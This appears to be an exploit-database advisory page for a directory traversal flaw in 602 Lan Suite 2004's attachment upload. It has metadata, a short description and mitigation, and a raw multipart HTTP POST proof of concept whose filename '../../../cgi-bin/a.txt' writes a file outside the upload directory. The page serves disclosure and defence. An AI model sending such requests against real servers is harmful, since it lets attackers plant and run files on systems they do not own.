header-logo
Suggest Exploit
vendor:
602 Lan Suite 2004
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: 602 Lan Suite 2004
Affected Version From: 2004.0.04.1221
Affected Version To: 2004.0.04.1221
Patch Exists: YES
Related CWE: N/A
CPE: a:software602:602_lan_suite_2004
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2004

602 Lan Suite 2004 File Attachment Upload Vulnerability

602 Lan Suite 2004 is reportedly affected by a vulnerability regarding the uploading of file attachments. This issue is due to the application failing to properly sanitize the names of file attachments before upload. A malicious user could exploit this vulnerability using directory traversal attacks to upload a file to an arbitrary location accessible by the affected server. This vulnerability could lead to the execution of a malicious file on the server hosting the application.

Mitigation:

Ensure that the application properly sanitizes user-supplied input before using it in file operations.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12495/info

602 Lan Suite 2004 is reportedly affected by a vulnerability regarding the uploading of file attachments. This issue is due to the application failing to properly sanitize the names of file attachments before upload. A malicious user could exploit this vulnerability using directory traversal attacks to upload a file to an arbitrary location accessible by the affected server.

This vulnerability could lead to the execution of a malicious file on the server hosting the application.

602 Lan Suite 2004 version 2004.0.04.1221 is reportedly vulnerable; other versions may also be affected. 

POST /mail HTTP/1.0
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------287661860715985
Content-length: 540

-----------------------------287661860715985
Content-Disposition: form-data; name="U"

6E13745843714258F86310B04D7
-----------------------------287661860715985
Content-Disposition: form-data; name="A"

ATTACHMENTS
-----------------------------287661860715985
Content-Disposition: form-data; name="FILENAME"; filename="../../../cgi-bin/a.txt"
Content-Type: text/plain

Test File
-----------------------------287661860715985
Content-Disposition: form-data; name="ATTACH"

Attach
-----------------------------287661860715985--

Navigation

Suggest Exploit

Services By CQR